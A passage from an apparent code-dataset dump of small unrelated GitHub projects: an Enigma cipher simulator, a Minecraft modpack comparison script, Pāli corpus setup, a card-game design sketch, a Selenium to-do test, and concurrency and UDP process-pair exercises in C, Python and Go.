pin_in\n\t\t\t\t\t\tbreak\n\n\t\t\tright_in = 0\n\t\t\twhile(right_in == 0): #finding pin to right rotor\n\t\t\t\tfor pin_in in mid_rotor:\n\t\t\t\t\tif(mid_rotor[pin_in] == mid_in):\n\t\t\t\t\t\tright_in = pin_in\n\t\t\t\t\t\tbreak\n\n\t\t\tentry_in = 0\n\t\t\t# print(right_rotor)\n\t\t\twhile(entry_in == 0): #finding pin to entry\n\t\t\t\tfor pin_in in right_rotor:\n\t\t\t\t\tif(right_rotor[pin_in] == right_in):\n\t\t\t\t\t\tentry_in = pin_in\n\t\t\t\t\t\tbreak\n\n\t\t\t#find what character has been output by all the rotor stuff\n\t\t\tfor letter in entry_mapping:\n\t\t\t\tif(entry_mapping[letter] == entry_in):\n\t\t\t\t\toutput_char = letter\n\t\t\t\t\tbreak\n\n\t\t\t##### 6. 
Plugboard (again) #####\n\t\t\t# print(\"step 6\")\n\t\t\t#if character needs to be swapped per plugboard\n\t\t\tif(output_char in plugboard): #char in keys\n\t\t\t\toutput_char = plugboard[output_char]\n\t\t\telif(output_char in plugboard.values()): #char in values\n\t\t\t\tfor key_char in plugboard:\n\t\t\t\t\tif(plugboard[key_char] == output_char):\n\t\t\t\t\t\toutput_char = key_char\n\t\t\t\t\t\tbreak\n\n\t\t\toutput_str = output_str + output_char\n\treturn output_str\n" }, { "alpha_fraction": 0.4477987289428711, "alphanum_fraction": 0.47044023871421814, "avg_line_length": 17.952381134033203, "blob_id": "a3a13de701af39bc2d76cc31d9774b8dfe21764f", "content_id": "6a3415a36e4a8000f8a82540fe83cde7559aa375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 795, "license_type": "no_license", "max_line_length": 84, "num_lines": 42, "path": "/src/plugboard.py", "repo_name": "ethanjpark/enigma_python", "src_encoding": "UTF-8", "text": "\"\"\" Plugboard pairings\n\n\tUp to 10 alphabetic pairings could be made via physical wire connections.\n\tThis was the final component of the encryption before the accompanying lamp\n\twould be lit for a keypress.\n\n\tTaken from the 31st, 30th, and 29th from keylist #649, link below:\n\thttps://en.wikipedia.org/wiki/Enigma_machine#/media/File:Enigma_keylist_3_rotor.jpg\n\"\"\"\n\nplugboard31 = { 'S':'Z',\n\t\t\t\t'G':'T',\n\t\t\t\t'D':'V',\n\t\t\t\t'K':'U',\n\t\t\t\t'F':'O',\n\t\t\t\t'M':'Y',\n\t\t\t\t'E':'W',\n\t\t\t\t'J':'N',\n\t\t\t\t'I':'X',\n\t\t\t\t'L':'Q' }\n\nplugboard30 = { 'I':'S',\n\t\t\t\t'E':'V',\n\t\t\t\t'M':'X',\n\t\t\t\t'R':'W',\n\t\t\t\t'D':'T',\n\t\t\t\t'U':'Z',\n\t\t\t\t'J':'Q',\n\t\t\t\t'A':'O',\n\t\t\t\t'C':'H',\n\t\t\t\t'N':'Y' }\n\nplugboard29 = { 'D':'J',\n\t\t\t\t'A':'T',\n\t\t\t\t'C':'V',\n\t\t\t\t'I':'O',\n\t\t\t\t'E':'R',\n\t\t\t\t'Q':'S',\n\t\t\t\t'L':'W',\n\t\t\t\t'P':'Z',\n\t\t\t\t'F':'N',\n\t\t\t\t'B':'H' }" } ]
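The ring-setting and starting-position arithmetic in `create_curr_rotor_wiring_dict` (input.py above) can be stated more compactly with modular arithmetic. A sketch for comparison only, not part of the repo; `wiring` is a letter-to-letter dict such as `rotors.rotorI`:

```python
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

def contact_mapping(wiring, ringstellung, start_pos):
    """Build the pin-to-pin mapping for one rotor, applying the ring
    setting and starting-position offsets the same way input.py does."""
    mapping = {}
    # Net shift: +(ringstellung - 1) for the ring, -(position - 1) for the start.
    shift = (ringstellung - 1) - ALPHABET.index(start_pos.upper())
    for i, letter in enumerate(ALPHABET, start=1):
        contact_in = (i + shift - 1) % 26 + 1
        contact_out = (ALPHABET.index(wiring[letter]) + 1 + shift - 1) % 26 + 1
        mapping[contact_in] = contact_out
    return mapping
```

The `% 26` wrap replaces the two explicit range checks (`> 26` and `< 1`) that input.py performs step by step.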
4
JeppeKlitgaard/FTB-Pack-Comparer
https://github.com/JeppeKlitgaard/FTB-Pack-Comparer
583e3bf8ffffaf8c4cb74a7153d577e00125ea06
58c74a8e970566ea765c30b9aebb64c4220de56b
a856f33c0382c9f8553c66a872f90dd65dc86f0c
refs/heads/master
2021-05-27T20:59:52.598250
2012-12-30T20:00:00
2012-12-30T20:00:00
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.580181896686554, "alphanum_fraction": 0.584490180015564, "avg_line_length": 24.468355178833008, "blob_id": "f03fdb57afb1ab6d7cd2e23fd7632dc5e8a56948", "content_id": "a16fc27d01babbe6ee5966dc8d75920748dc4c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2089, "license_type": "no_license", "max_line_length": 78, "num_lines": 79, "path": "/compare.py", "repo_name": "JeppeKlitgaard/FTB-Pack-Comparer", "src_encoding": "UTF-8", "text": "import urllib2 # Import urllib2 for downloading the xml.etree\r\nimport xml.etree.ElementTree as et # Import ElementTree for parsing xml.etree\r\nimport csv # For outputting.\r\nimport re\r\n\r\nxml_url = \"http://www.creeperrepo.net/static/FTB2/modpacks.xml\"\r\nraw_xml = urllib2.urlopen(xml_url) # We don't use .read() because et.parse\r\n# Takes a file object.\r\n\r\nroot = et.parse(raw_xml).getroot()\r\n\r\n\r\ndef normalize(string):\r\n \"\"\"Normalizes a string.\"\"\"\r\n string = string.lower() # Lower case\r\n\r\n string = string.replace(\"'\", \"\")\r\n\r\n regex = re.compile(r\" by (.)*\")\r\n string = re.sub(regex, \"\", string)\r\n\r\n regex = re.compile(r\"(\\d)+\")\r\n string = re.sub(regex, \"\", string)\r\n\r\n string = string.replace(\" \", \"\")\r\n\r\n string = string.title()\r\n\r\n return string\r\n\r\nmods = [] # Compile a list of all the mods used.\r\npacks = [] # Compile a list of all the packs.\r\nfor pack in root: # For every pack in the mod packs\r\n packs.append(pack.attrib[\"name\"])\r\n for mod in pack.attrib[\"mods\"].split(\"; \"): # For every mod in pack\r\n mod = normalize(mod)\r\n\r\n if mod not in mods:\r\n mods.append(mod.replace(\" \", \"\").title()) # Add to known mods.\r\n\r\nmods = sorted(mods) # Sort mods alphabeticly - I spelled alphabeticly wrong\r\n# didn't I. 
Oh well.\r\n\r\n# Write it.\r\nrows = []\r\nrows.append(mods)\r\n\r\nfor pack in root:\r\n row = []\r\n row.append(pack.attrib[\"name\"] + \"(%s)\" % pack.attrib[\"mcVersion\"])\r\n\r\n for _ in range(1, len(mods)):\r\n row.append(\"NO\")\r\n\r\n for mod in pack.attrib[\"mods\"].split(\"; \"):\r\n mod = normalize(mod)\r\n\r\n i = 0\r\n for compare_mod in rows[0]:\r\n if mod == compare_mod and i > 0:\r\n row[i] = \"YES\"\r\n i += 1\r\n rows.append(row)\r\n\r\n\r\n### Credits.\r\nrows.append([])\r\nrows.append([\"Made by: Dkkline\"])\r\nrows.append([\"Source is on my github.\"])\r\n\r\n\r\nwith open(\"ftb_compare.csv\", \"wb\") as csvfile:\r\n writer = csv.writer(csvfile, delimiter=\"_\")\r\n for row in rows:\r\n writer.writerow(row)\r\n\r\n\r\nprint \"Made by Dkkline.\"\r\nprint \"Saved to: ftb_compare.csv\"" }, { "alpha_fraction": 0.7192575335502625, "alphanum_fraction": 0.7285382747650146, "avg_line_length": 40.0476188659668, "blob_id": "74092eb361b324028dc48e89e592c90d6a765cd2", "content_id": "0380b3f43212725494fc1627c62cb2889f290950", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 862, "license_type": "no_license", "max_line_length": 114, "num_lines": 21, "path": "/README.md", "repo_name": "JeppeKlitgaard/FTB-Pack-Comparer", "src_encoding": "UTF-8", "text": "FTB-Pack-Comparer\n=================\n\nGenerates a CSV file for importing to Google Docs containing a comparison of the different FTB packs.\n\n\n\"Official\" google docs page: https://docs.google.com/spreadsheet/pub?key=0AoBvEi8Kl59JdDN4SFdIS3ZJNDAtekZPWEYxU083RGc&single=true&gid=0&output=html\nOnly DW20 and MindCrack: https://docs.google.com/spreadsheet/pub?key=0AoBvEi8Kl59JdGVBYUUwX1dGLWZDdW9PRDB0cFdZc3c&single=true&gid=0&output=html\n\n\nSetup\n=====\n* Generate a csv file by executing `python compare.py`\n* Go to docs.google.com, create a new spreadsheet, and import the file with separator: \"_\"\n* Select all the fields (press the little square between the \"1\" and \"A\" fields.)\n* Set font size to 18.\n* Right click -> Conditional formatting\n* Make 2 rules; they have to be exactly \"YES\" and \"NO\": \"YES\" should be green, \"NO\" should be red.\n* Profit.\n\nThis tutorial is extremely sloppy, but I don't expect anyone to use this except me, so that's fine!\n" } ]
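To make the behaviour of `normalize()` in compare.py concrete, here are a few illustrative inputs (made-up mod strings, not taken from the live modpacks.xml feed) and the outputs the rules produce:

```python
# Each step: lowercase -> drop apostrophes -> strip a trailing " by <author>"
# -> strip digits -> drop spaces -> title-case the result.
assert normalize("IndustrialCraft 2 by Alblaka") == "Industrialcraft"
assert normalize("Thaumcraft 3") == "Thaumcraft"
assert normalize("Forestry by SirSengir") == "Forestry"
```

This is what lets the same mod line up across packs even when different packs list different versions or author credits.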
2
ilonabudapesti/buddhism-nlp
https://github.com/ilonabudapesti/buddhism-nlp
7b5d898e07ba53c7eefec8f1f2b4ae358085d8aa
e5c004a66801addebd0727bf7613a4e3fb137c15
0a492eec03b3eba43a30ace3bcdb7e49f29ef7ad
refs/heads/master
2021-08-22T23:11:46.864767
2017-12-01T15:39:54
2017-12-01T15:39:54
107,881,243
13
2
null
null
null
null
null
[ { "alpha_fraction": 0.8272727131843567, "alphanum_fraction": 0.8272727131843567, "avg_line_length": 55, "blob_id": "41d18b59e6c073b033fb6e81ebe67c9ab3954faa", "content_id": "2ed583350d1e960e9c1ab481b4d41612e0ab129f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "no_license", "max_line_length": 94, "num_lines": 2, "path": "/README.md", "repo_name": "ilonabudapesti/buddhism-nlp", "src_encoding": "UTF-8", "text": "# buddhism-nlp\nNatural language processing on Buddhist texts in Pāli and Sanskrit, mostly corpus linguistics.\n" }, { "alpha_fraction": 0.5187265872955322, "alphanum_fraction": 0.5224719047546387, "avg_line_length": 14.833333015441895, "blob_id": "869ac708436c8675639d0ea88576d9a86b5fd650", "content_id": "026200d5db6e265131b62503411ef147f41ec677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 557, "license_type": "no_license", "max_line_length": 71, "num_lines": 36, "path": "/Thesis_Oxford_MSt/DPR_Myanmar_xml_and_processing/processed/corpus.py", "repo_name": "ilonabudapesti/buddhism-nlp", "src_encoding": "UTF-8", "text": "from nltk.corpus import PlaintextCorpusReader\ncorpus_root = '/Dropbox/repos/digitalpalireader/DPRMyanmar/content/xml'\n\n\n# fileid[0] encodes the genre/collection:\ngenres = {\n 'v': 'Vinaya',\n 'd': 'Dīgha',\n 'm': 'Majjhima',\n 's': 'Saṃyutta',\n 'a': 'Aṅguttara',\n 'k': 'Khuddaka',\n 'x': 'Vism',\n # codes not yet identified: 'Abhidhamma', 'Abhidh-s', 'Byākaraṇa'\n 'b': None, # TODO\n 'g': None, # TODO\n}\n\n# fileid[-1] encodes the text level:\nlevel = {\n 'm': 'Mūla',\n 'a': 'Aṭṭhakathā',\n 't': 'ṭīka',\n}\n\nbaskets = {\n 'vinayapiṭaka': ['v'],\n 'suttapiṭaka': ['d', 's', 'a', 'm'],\n 'abhidhammapiṭaka': [], # TODO: codes unknown\n}\n" } ]
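A sketch of how the lookup tables in corpus.py might be applied once a reader is instantiated. The fileid naming (and whether an extension needs stripping) is an assumption that would need checking against the actual DPR files:

```python
reader = PlaintextCorpusReader(corpus_root, r'.*')

def classify(fileid):
    """Map a DPR fileid to (genre, level) using the tables above."""
    stem = fileid.rsplit('/', 1)[-1].rsplit('.', 1)[0]  # drop path and extension
    return genres.get(stem[0], 'unknown'), level.get(stem[-1], 'unknown')

for fid in reader.fileids():
    print(fid, classify(fid))
```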
2
103percent/starreigns
https://github.com/103percent/starreigns
5dd3bf7c156dc886a4e1d724302ebc202b154377
8921a610c1664e5de4412c9899e2250fa8f239fd
68ff614ce894475ff6846bd156af249e32228f2d
refs/heads/master
2020-03-22T10:26:01.530704
2017-04-05T19:38:55
2017-04-05T19:38:55
74,374,794
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6786773800849915, "alphanum_fraction": 0.6888512372970581, "avg_line_length": 42.87272644042969, "blob_id": "6317cdfc9004a1ca1775bfd68ecefe2c8f171067", "content_id": "07c5aba14bcd42ec9afdf4a8d77bc4557c868225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2359, "license_type": "no_license", "max_line_length": 169, "num_lines": 55, "path": "/deckSystemDesign/abstractFramework.py", "repo_name": "103percent/starreigns", "src_encoding": "UTF-8", "text": "## Variables ##\n \nall_cards #(array of objects): Collection of JSON documents (for example, describing each card).\neligible_cards #(array of objects): A subset of the allCards collection. Cards that could be shown to the player, and their weightings.\nencounters #(int): The number of encounters the player will see before having to wait. \nplayer_state # (array of objects): Describes the current state of the core values, the narrative(s) underway, and a history of relevant choices made by the player. \n\n## Example of Card ##\n\n{ \n \"unique_id\": \"ENGINEER-UNDERATTACK-002\",\n \"encounter_string\": \"The hull is severely compromised by enemy fire, should we direct additional power to the shields?\", \n \"card_image\": \"picture_of_engineer.jpeg\",\n\t\"set\": \"basic_engineer\", # cards can only belong to one set.\n\t\"tags\": [\"engineer\", \"under_attack\"],\n\t\"prerequisites\": { #Things which MUST be true in order for the card to be considered eligible.\n\t\t\"player_state.core.hull\": {\"$lte\": 25},\n\t\t\"player_state.setsOwned\": {\"$includes\": \"basic_engineer\"}\n\t},\n\t\"weights\": { #Things which influence the probability of this card showing up or not if it is eligible.\n\t\t\"base_weight\": 100,\n\t\t\"player_state.history\": {\n\t\t\"range\": [0, 9], # Last 10 cards swiped\n\t\t\"tags\": {\"$includes\": \"engineer\"}, # for each one that has the engineer tag\n\t\t\"adjust_weight\": -60 # lower weight by 60, to a minimum of zero\n\t\t}\n\t},\n \"leftdata\" : { # What the 'left' choice is and what happens if you choose it.\n \"choice_string\" : \"Yes\",\n\t\t\"consequences\": {\n\t\t\t\"player_state.core.power\": -20\n\t\t},\n\t\t\"trigger_event\": \"ALIENS-RETREATING-SPECIAL\" # Reference to a card to show next. Does not decrease the encounters total. May be the only way to see this card at all.\t\n\t},\n\t \"rightdata\" : { # What the 'right' choice is and what happens if you choose it.\n \"choice_string\" : \"No\",\n\t\t\"consequences\": {\n\t\t\t\"player_state.core.hull\": -30,\n\t\t\t\"player_state.core.crew\": -15\n\t\t}\t\n\t},\t \n}\n\n## Session Behaviour ##\n\nwhile(encounters > 0){\nsample a card from eligible_cards based on their weights, making any adjustments that the cards demand (see the weighted-draw sketch below);\nResolve the effects of the player's decision;\nencounters -= 1;\nupdate eligible_cards;\n}\nStart timer to give the player more encounters;\nTell the player to go play with their balls until the encounters regenerate;\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 21, "blob_id": "cba2a183a047cf13aed87d77fa39b0a9fbef366f", "content_id": "b2b8fda61e132b6d8824965e59424508f4383469", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/README.md", "repo_name": "103percent/starreigns", "src_encoding": "UTF-8", "text": "# starreigns\nPrototype for our game concept\n" } ]
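The weighted draw in the session loop could look like the following Python sketch. The field names are taken from the example card above; everything else (flooring at zero, one adjustment per matching recent encounter) follows the comments in the `weights` block:

```python
import random

def pick_card(eligible_cards, player_state):
    weights = []
    recent = player_state['history'][0:10]  # the example card's "range": [0, 9]
    for card in eligible_cards:
        w = card['weights']['base_weight']
        rule = card['weights'].get('player_state.history')
        if rule:
            tag = rule['tags']['$includes']
            matches = sum(1 for seen in recent if tag in seen['tags'])
            # Apply the adjustment once per matching recent card, floor at zero.
            w = max(0, w + rule['adjust_weight'] * matches)
        weights.append(w)
    # random.choices needs at least one positive weight among eligible cards.
    return random.choices(eligible_cards, weights=weights, k=1)[0]
```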
2
vendice/tdd-book
https://github.com/vendice/tdd-book
62ac458728b32801cd63bbccf289c4d37f35244f
666cd3d3b86c9e5db3b65936a0c503afd1d8a831
46f443a5e3a470fd627a98bdb99a4d2a9b6c53ab
refs/heads/master
2020-03-21T22:36:48.406381
2018-07-08T09:27:57
2018-07-08T09:27:57
139,136,891
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6364068388938904, "alphanum_fraction": 0.6402091383934021, "avg_line_length": 34.64406967163086, "blob_id": "a540bc583c10f9141a7e4f90142e03380554ceb3", "content_id": "95f1eefbcd4c513bbcf008271557335f832f387e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2104, "license_type": "no_license", "max_line_length": 170, "num_lines": 59, "path": "/functional_tests.py", "repo_name": "vendice/tdd-book", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport unittest\n\nclass NewVisitorTest(unittest.TestCase):\n\n def setUp(self):\n self.browser = webdriver.Firefox()\n\n def tearDown(self):\n self.browser.quit()\n \n def check_for_row_in_list_table(self, row_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n def test_can_start_a_list_and_retrieve_it_later(self):\n\n\n # The user has heard about a new to-do app and visits it\n self.browser.get('http://localhost:8000')\n\n # He looks at the page title and header, and sees To-Do\n self.assertIn('To-Do', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # He can enter a to-do item straight away\n inputbox = self.browser.find_element_by_id('id_new_item')\n self.assertEqual(inputbox.get_attribute('placeholder'), 'Enter a to-do item')\n\n # He types 'einkaufen' (shopping)\n inputbox.send_keys('einkaufen')\n\n # When he hits enter, the page updates and lists the first item; the input box is still there, so he can add further items\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n self.check_for_row_in_list_table('1: einkaufen')\n\n # The text box is still there, so he enters a second item, 'essen' (food)\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('essen')\n inputbox.send_keys(Keys.ENTER)\n time.sleep(1)\n\n # After pressing enter, both items appear below the text box\n self.check_for_row_in_list_table('1: einkaufen')\n self.check_for_row_in_list_table('2: essen')\n\n self.fail('Finish the test!')\n # The list is reachable via a unique URL\n\n # After visiting that URL, the items are still there\n\n\nif __name__ == '__main__':\n \n unittest.main(warnings='ignore')\n\n" } ]
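The fixed `time.sleep(1)` after each keystroke is the simplest thing that could work, but it is either too slow or too flaky. A common refinement (not in this file yet) is a polling helper that retries until the expected row appears or a timeout expires:

```python
import time
from selenium.common.exceptions import WebDriverException

MAX_WAIT = 10  # seconds

def wait_for_row_in_list_table(self, row_text):
    """Retry the table lookup until the row shows up or MAX_WAIT passes."""
    start_time = time.time()
    while True:
        try:
            table = self.browser.find_element_by_id('id_list_table')
            rows = table.find_elements_by_tag_name('tr')
            assert row_text in [row.text for row in rows]
            return
        except (AssertionError, WebDriverException):
            if time.time() - start_time > MAX_WAIT:
                raise  # give up and surface the original failure
            time.sleep(0.5)
```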
1
larskfjntnu/TTK4145--vinger
https://github.com/larskfjntnu/TTK4145--vinger
b4e50318459ed93177249c28ab11ae51d8c8c032
2a7b839f39f6c8f73800de8c03146fd34e5bf722
e32439189d3bca9531b4f7a0706f29ea0ab65077
refs/heads/master
2020-12-03T04:17:11.811391
2016-02-17T22:52:01
2016-02-17T22:52:01
49,940,682
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6509554386138916, "alphanum_fraction": 0.6656050682067871, "avg_line_length": 22.432836532592773, "blob_id": "f560743d4875d04a175419fb424119c677e931f5", "content_id": "836150849d919d41ea1d2fe72841e1b15b84aa47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1570, "license_type": "no_license", "max_line_length": 165, "num_lines": 67, "path": "/oving6/phoenix.go", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"time\"\n\t\"udp\"\n\t\"os/exec\"\n)\n\nfunc main() {\n\tvar count int = 0\n\tvar backupCount int = count\n\tsendTimer := time.NewTimer(time.Second)\n\tmasterTimer := time.NewTimer(3000 * time.Millisecond)\n\treceiveChannel := make(chan int)\n\tsendChannel := make(chan int)\n\tkillChannel := make(chan struct{})\n\tkilledChannel := make(chan struct{})\n\t\n\t// Do some checking to see if booted to master or backup\n\tbackup := flag.Bool(\"backup\", false, \"Set backup or not\")\n\tflag.Parse()\n\t// Do the right thing depending on if master or backup\n\tif *backup {\n\t\tfmt.Println(\"Backup mode..\")\n\t\tgo udp.ReadUdp(receiveChannel, killChannel, killedChannel)\n\t} else {\n\t\tfmt.Println(\"Master mode..\")\n\t\tstartBackup()\n\t\tgo udp.SendUdp(sendChannel)\n\t}\n\tfor {\n\t\tselect {\n\t\tcase <-sendTimer.C:\n\t\t\tif !*backup {\n\t\t\t\tfmt.Printf(\"Count: %d\\n\", count)\n\t\t\t\tcount++\n\t\t\t\tsendChannel<-count\n\t\t\t\tsendTimer.Reset(time.Second)\n\t\t\t}\n\t\tcase <-masterTimer.C:\n\t\t\t// Master has timed out.\n\t\t\tif *backup {\n\t\t\t\t*backup = false\n\t\t\t\tcount = backupCount\n\t\t\t\tsendTimer.Reset(time.Second)\n\t\t\t\tmasterTimer.Stop();\n\t\t\t\t// Kill the UDP listener.\n\t\t\t\tclose(killChannel)\n\t\t\t\ttime.Sleep(2000*time.Millisecond)\n\t\t\t\t//<-killedChannel\n\t\t\t\tgo udp.SendUdp(sendChannel)\n\t\t\t\tstartBackup()\n\t\t\t}\n\t\tcase mes := <-receiveChannel:\n\t\t\tif *backup{\n\t\t\t\tbackupCount = mes\n\t\t\t\tmasterTimer.Reset(1500*time.Millisecond)\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunc startBackup(){\n\t(exec.Command(\"osascript\", \"-e\",\"tell app \\\"Terminal\\\" to do script \\\"/Users/Lars/Dropbox/NTNU/Semester6/TTK4145/TTK4145--vinger/oving6/phoenix -backup\\\"\")).Start()\n}\n" }, { "alpha_fraction": 0.5030674934387207, "alphanum_fraction": 0.5766870975494385, "avg_line_length": 13.818181991577148, "blob_id": "b7a7ef65cea8f95ca0a9a64c2eb31c44d2cdf4f1", "content_id": "a0af358f8320da0e603ab7eea082d6de94c7c2c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 326, "license_type": "no_license", "max_line_length": 37, "num_lines": 22, "path": "/Øving1/pythonImpl.py", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "__author__ = 'Lars und Zach'\n\nimport thread\nimport time\n\n\ni = 0\n\ndef thread_1():\n for count in range(0, 1000000):\n global i\n i += 1\n\ndef thread_2():\n for count in range(0, 1000000):\n global i\n i -= 1\n\nthread.start_new_thread(thread_1, ())\nthread.start_new_thread(thread_2, ())\ntime.sleep(1)\nprint i\n" }, { "alpha_fraction": 0.6083915829658508, "alphanum_fraction": 0.632867157459259, "avg_line_length": 19.446428298950195, "blob_id": "966dbd5351079d6d090cc0319a0db6b47b8e3c94", "content_id": "a4539107e3b14c213bd5253fdba6f13cfd2d1b1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1144, "license_type": "no_license", 
"max_line_length": 59, "num_lines": 56, "path": "/Øving2/cImpl.c", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n#include <pthread.h>\n#include <stdlib.h>\n#include <unistd.h>\n\n/*\n\tTo compile : gcc -o OutputFile cFile\n\tTo run: ./OutputFile\n*/\n\t\nint i = 0;\npthread_mutex_t lock; // The mutex thread that is the lock.\n\nvoid *thread_1(){\n\tpthread_mutex_lock(&lock);\n\tfor (int count = 0; count < 1000001; count++)\n\t{\n\t\ti++;\n\t}\n\tprintf(\"%s\\n\", \"Done incrementing\");\n\tpthread_mutex_unlock(&lock);\n\tpthread_exit(NULL);\n}\n\nvoid *thread_2(){\n\tpthread_mutex_lock(&lock);\n\tfor (int count = 0; count < 1000000; count++){\n\t\ti--;\n\t}\n\tprintf(\"%s\\n\", \"Done decrementing\");\n\tpthread_mutex_unlock(&lock);\n\tpthread_exit(NULL);\n}\n\nint main(void){\n\t// Initialize the lock\n\tif(pthread_mutex_init(&lock, NULL) != 0){\n\t\tprintf(\"%s\\n\", \"Error initializing mutex\" );\n\t\treturn 1;\n\t}\n\n\t// Create the threads\n\tpthread_t thr[2];\n\tpthread_create(&thr[0], NULL, thread_1, NULL);\n\tpthread_create(&thr[1], NULL, thread_2, NULL);\n\n\tprintf(\"%s\\n\", \"Waiting to join threads\" );\n\t/* block until all threads complete */\n for (int count = 0; count < 2; count++) {\n \tpthread_join(thr[count], NULL);\n }\n pthread_mutex_destroy(&lock);\n printf(\"%i\\n\",i);\n\n}" }, { "alpha_fraction": 0.5939086079597473, "alphanum_fraction": 0.6480541229248047, "avg_line_length": 14.15384578704834, "blob_id": "1c9dc7738ad6959aa0d0da589c948ab969d30e63", "content_id": "410af5332456584c4544f1839487452299320208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 591, "license_type": "no_license", "max_line_length": 62, "num_lines": 39, "path": "/Øving1/goImpl.go", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "// goImpl\npackage main\n\nimport (\n\t\"fmt\"\n\t\"sync\"\n\t\"time\"\n)\n\nvar i int = 0\n\nfunc thread_1() {\n\tfor counter := 0; counter < 1000000; counter++ {\n\t\ti++\n\n\t}\n}\n\nfunc thread_2() {\n\tfor counter := 0; counter < 1000000; counter++ {\n\t\ti--\n\t}\n}\n\nfunc main() {\n\tvar wg sync.WaitGroup\n\twg.Add(2)\n\tgo thread_1()\n\tgo thread_2()\n\ttime.Sleep(1000 * time.Millisecond)\n\n\tfmt.Println(i)\n\t/* The scheduler suspends and starts the threads at random,\n\tmeaning the first thread could increment to any number < 10^6\n\tthen the second thread starts decrementing it to any\n\t> i's current value - 10^6 and so on.\n\t*/\n\n}\n" }, { "alpha_fraction": 0.5480984449386597, "alphanum_fraction": 0.599552571773529, "avg_line_length": 14.964285850524902, "blob_id": "89a72b7f4b6594ab197d481095582080796a13c2", "content_id": "689bc1aec9f913473a1b5320f8cc6fce3674833f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "no_license", "max_line_length": 37, "num_lines": 28, "path": "/Øving2/pythonImpl.py", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "__author__ = 'Lars und Zach'\n\nimport thread\nimport time\nimport threading\n\n\ni = 0\nmutex = threading.Lock()\n\ndef thread_1():\n mutex.acquire()\n for count in range(0, 100000):\n global i\n i += 1\n mutex.release()\n\ndef thread_2():\n mutex.acquire()\n for count in range(0, 1000000):\n global i\n i -= 1\n mutex.release()\n\nthread.start_new_thread(thread_1, ())\nthread.start_new_thread(thread_2, ())\ntime.sleep(1)\nprint i\n" }, { 
"alpha_fraction": 0.6220158934593201, "alphanum_fraction": 0.6458885669708252, "avg_line_length": 19.671232223510742, "blob_id": "6ab11f3d0074865e4038f245ffe6e82a3124b822", "content_id": "575c35ee5ba7c2ddfa3a9ee147ba4bb1ba3e8fc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 80, "num_lines": 73, "path": "/oving6/src/udp/udp.go", "repo_name": "larskfjntnu/TTK4145--vinger", "src_encoding": "UTF-8", "text": "package udp\n\n/*\n\tThis package acts as the network program for the phoenix program.\n\tIt is a standardized udp package that sends a byte slice over the network\n\tusing the udp protocol.\n*/\n\nimport (\n\t\"fmt\"\n\t\"net\"\n\t\"strconv\"\n)\ntype Message struct{\n\tValue int\n}\nfunc SendUdp(message chan int) {\n\tlocaladdress, err := net.ResolveUDPAddr(\"udp4\", \":9001\")\n\tbroadcastaddress,err := net.ResolveUDPAddr(\"udp4\", \"255.255.255.255:9000\")\n\tif err != nil {\n\t\tfmt.Println(\"UDP:\\t Could not resolve UDPAddress.\")\n\t\treturn \n\t}\n\tsock, err := net.ListenUDP(\"udp4\", localaddress)\n\tdefer func() {sock.Close()}()\n\tif err != nil {\n\t\tfmt.Printf(\"%s\\n\",err)\n\t\treturn\n\t}\n\tfor{\n\t\tselect{\n\t\t\tcase val :=<-message:\n\t\t\ttempstr := strconv.Itoa(val)\n\t\t\ttempslc := []byte(tempstr)\n\t\t\tsock.WriteToUDP(tempslc, broadcastaddress)\n\t\t}\n\t}\n\tfmt.Printf(\"Closing socket.\\n\")\n\tsock.Close()\n}\n\n/*\n\tThis will be run as a goroutine\n*/\nfunc ReadUdp(readChannel chan int, killChannel , killedChannel chan struct{}) {\n\tlocaladdress, err := net.ResolveUDPAddr(\"udp4\", \"0.0.0.0:9000\")\n\tsock, err := net.ListenUDP(\"udp4\", localaddress)\n\t\n\tdefer func() {sock.Close()}()\n\tdefer close(killedChannel)\n\n\tif err != nil {\n\t\tfmt.Printf(\"%s\\n\",err)\n\t\treturn\n\t}\n\tvar buf []byte = make([]byte, 16)\n\tfor {\n\t\tselect{\n\t\tcase _ , ok := <- 